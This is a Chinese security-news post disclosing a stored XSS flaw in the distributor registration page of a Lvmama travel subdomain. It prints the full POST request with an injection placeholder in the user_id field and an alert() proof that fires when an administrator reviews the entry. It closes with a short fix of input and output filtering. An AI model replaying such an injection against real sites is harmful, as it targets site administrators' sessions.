驴妈妈旅游网某分站XSS漏洞

华盟君华盟君 最新资讯,漏洞 8年前
4.33W 0
华盟原创文章投稿奖励计划

 

               驴妈妈旅游网某分站XSS漏洞 

 

  url:

  http://fenxiao.lvmama.com/reg.jsp

  POST /reg.jsp HTTP/1.1

  Host: fenxiao.lvmama.com

  Proxy-Connection: keep-alive

  Content-Length: 282

  Cache-Control: max-age=0

  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

  Origin: http://fenxiao.lvmama.com

  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36

  Content-Type: application/x-www-form-urlencoded

  Referer: http://fenxiao.lvmama.com/reg.jsp

  Accept-Encoding: gzip, deflate

  Accept-Language: zh-CN,zh;q=0.8

  Cookie: lvsessionid=311e0531-0b05-4e91-ad08-21e612e27a52_14439380; JSESSIONID=eG-zsmskW8Vh; startadd=10011

  user_id=[xsscode]&password=123456&repassword=123456&cust_name=das&link_name=dsadas&link_phone=&link_mobile=13174189632&link_qq=dsad&link_fax=d&link_email=&provid=10011&cityid=&area_id=10011&link_address=&sale_channel=0&source_url=http%3A%2F%2Ffenxiao.lvmama.com%2F&cust_desc=&sale_type=1

  对输入的信息没有做任何过滤,只要等待管理员审核就可以触发就可以了。

  alert('hello,world.')

  分销商后台管理:

驴妈妈旅游网某分站XSS漏洞   

拒绝合作分销商:

驴妈妈旅游网某分站XSS漏洞 

合作中分销商:

驴妈妈旅游网某分站XSS漏洞 

修复方案:
输入过滤 和 输出过滤

 

 

原文地址:https://exploits.77169.com/2015/20151103134344.shtm

本文原创,作者:华盟君,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/22300.html
华盟君官方
华盟君

3.37K篇文章
Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 20480 bytes) in /data/wwwroot/www.77169.net/wp-includes/wp-db.php on line 2022